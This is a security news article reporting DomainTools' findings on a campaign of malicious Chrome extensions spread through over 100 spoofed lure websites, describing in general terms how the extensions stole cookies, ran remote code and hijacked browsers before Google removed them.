A threat actor has been running an ongoing and sophisticated campaign involving malicious Chrome browser extensions, first detected in February 2024. The extensions, while appearing as useful productivity tools or legitimate services, are in fact sophisticated tools for cyber espionage, data exfiltration, and browser hijacking.
According to a new report by the DomainTools Intelligence (DTI) team, the malicious extensions were distributed via convincing websites that impersonate a wide range of services, including VPNs, crypto platforms, and ad creation tools and banking utilities. The threat actors created and operated more than 100 fake websites to funnel users into downloading these extensions from the official Chrome Web Store.
“The extensions typically have a dual functionality, in which they generally appear to function as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code,” the researchers noted.
One notable aspect of the campaign is the use of the manifest.json file to grant elevated permissions to the malicious extensions. This allows them to interact with every webpage a user visits, load and execute arbitrary code from attacker-controlled servers, and inject ads or redirect traffic at will.
Additionally, the extensions were found to employ a lesser-known browser event, the onreset handler on a temporary DOM element, to execute malicious scripts. This technique may be designed to circumvent browser-enforced Content Security Policy (CSP) protections, enabling the covert execution of harmful commands.
Several of the campaign’s lure websites spoofed well-known services such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats. Once users were convinced to install the extensions, the malicious code harvested browser session cookies, established persistent WebSocket connections for command-and-control (C2) communication, and even turned browsers into proxy nodes for redirecting traffic.
While the exact method of initial victim targeting remains unclear, DomainTools believes phishing emails and social media channels may be involved.
“Many lure sites contained Facebook tracking IDs,” the researchers said, “suggesting the campaign may be leveraging Facebook pages, groups, or advertisements to drive traffic.”
Because the fake extensions were hosted on the Chrome Web Store and supported by professional-looking websites, they were easily discoverable through both traditional web search and Chrome Web Store queries, adding a layer of legitimacy to their appearance. Google has since removed the malicious extensions from the Chrome Web Store.
